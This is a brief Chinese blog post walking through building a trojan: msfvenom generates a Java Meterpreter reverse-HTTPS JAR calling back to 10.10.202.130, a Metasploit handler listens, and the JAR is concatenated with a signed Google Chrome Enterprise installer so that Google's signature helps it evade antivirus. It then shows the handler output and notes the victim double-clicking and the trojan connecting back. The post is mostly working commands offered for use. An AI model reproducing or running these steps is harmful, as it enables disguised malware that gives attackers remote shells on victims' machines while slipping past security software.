Kail Linux 

# msfvenom -p java/meterpreter/reverse_https LHOST=10.10.202.130 -f jar -o meterpreter-https.jar

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload java/meterpreter/reverse_https

msf5 exploit(multi/handler) > set LHOST 10.10.202.130

 

对生成的jar软件包进行合成

meterpreter-https.jar

copy /b GoogleChromeStandaloneEnterprise64.msi + meterpreter-https.jar GoogleChromeStandaloneEnterprise64.jar

使用Google软件包签名,绕过杀软

 

 

使用virustotal进行查杀

https://www.virustotal.com/gui/file/4937f7b7fbece98a3e95d94e67d56bbba6b8a28c0c9b678d0f605a9ba55acaae/detection

使用Google软件包签名,绕过杀软

 

 

开始监听:

msf5 exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.10.202.130:8443

双加jar文件

使用Google软件包签名,绕过杀软

马儿上线。。。

 

相关文章:

  • 2022-01-09
  • 2021-08-12
  • 2021-11-26
  • 2021-11-08
  • 2022-12-23
  • 2021-06-17
  • 2021-11-13
  • 2022-12-23
猜你喜欢
  • 2021-12-30
  • 2021-09-08
  • 2022-12-23
  • 2021-09-26
  • 2022-02-06
  • 2021-08-07
  • 2021-09-17
相关资源
相似解决方案